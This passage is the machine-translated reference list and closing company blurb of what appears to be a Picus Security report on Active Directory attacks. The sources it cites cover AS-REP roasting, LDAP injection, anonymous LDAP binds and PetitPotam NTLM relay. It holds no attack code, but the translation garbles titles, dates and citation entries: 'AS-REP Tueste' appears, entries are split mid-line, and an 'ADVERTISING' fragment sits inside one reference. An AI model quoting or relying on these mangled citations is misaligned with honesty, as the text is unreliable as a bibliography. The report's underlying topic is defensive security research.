." [Online]. Available: [Link]

[Consulted: February 10, 2023]

"AS-REP Tueste". [Online]. Available:

[Link]

credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting. [Query: February 8 of

2023

A. Berlin, "How to detect the AS-REP roast with" Blumira December 7, 2021. [Online].

Available: [Link] [Consulted: February 8, 2023]

AS-REP Tueste. [Online]. Available:

[Link]

credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting. [Query: February 8,

2023

[40] J. Dibley, "Descifrado de contraseñas de Active Directory con AS-REP Roasting" [en línea].

Available:

[Link]

[Consulted: February 8, 2023]

[41]A. Dizdar, "Guía completa para la inyección de LDAP: tipos, ejemplos y prevención" Brilliant

Security ,
02June 2021. [Online]. Available: [Link]

[Consulted: February 9, 2023]

LDAP Injection Prevention - OWASP Cheat Sheet Series. [Online]. Available:

[Link]

.html. [Consulted: February 9, 2023]

Machine Translated by Google

T. Howes and MC Smith, “RFC ft-ietf-ldapbis-filter: lightweight access to directories

Protocol (LDAP): Representation of search filter strings, IETFdata trackersJune 8, 2006.

[Online]. Available: [Link] [Consulted: February 09]

2023

The LDAP link operation, [Link] April 27, 2018. [Online]. Available:

[Link] [Consulted: February 9, 2023]

3.4 - The anonymous link on the LDAP server must be disabled.
[Link]
review: 8bc4cb19c1fe0abfc3edcf804e7603f0. [Consulted: February 9, 2023]

M.-A. Moreau, "Why should non-authenticated LDAP links of Active Directory be disabled?"
Yes, and how to do it, The Returns Blog . [Online]. Available:
[Link]
should-be-disabled-and-how-to-do-it/. [Consulted: February 9, 2023]

Input Validation - OWASP Cheat Sheet Series. [Online]. Available:

[Link]
[Consulted: February 9, 2023]

From Strange to DA // Using PetitPotam to Relay NTLM to Domain Administrator

Truesec [Online]. Available:

[Link]
to the active directory. [Consulted: February 9, 2023]

GitHub - topotam/PetitPotam: PoC tool to force Windows hosts to authenticate on

other machines through MS-EFSRPC EfsRpcOpenFileRaw or other functions, GitHub . [Online].

Available: [Link] [Accessed: February 09, 2023]

50 LittlePotam | NTLM Relay Attacks CS Mimikatz
ADVERTISING | rubeus
| | Acquisition of domain . (Jul.
29, 2021) [Online]. Available: [Link]
[Consulted: February 9, 2023]

KB5005413: Mitigation of NTLM relay attacks in Active Directory (AD) certificate services

CS)." [Online]. Available:

[Link]
Active Directory certificate services - ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 services.
[Consulted: February 9, 2023]
Machine Translated by Google

About

At Picus Security, we help organizations validate, measure, and continuously improve.

the effectiveness of their security controls so that they can assess risks more effectively
precision and strengthen cyber resilience.

As a pioneer of breach and attack simulation (BAS), security teams

Everyone around the world uses our complete security control validation platform.
to proactively identify security gaps and gain useful insights for
address them.

[Link]

security picus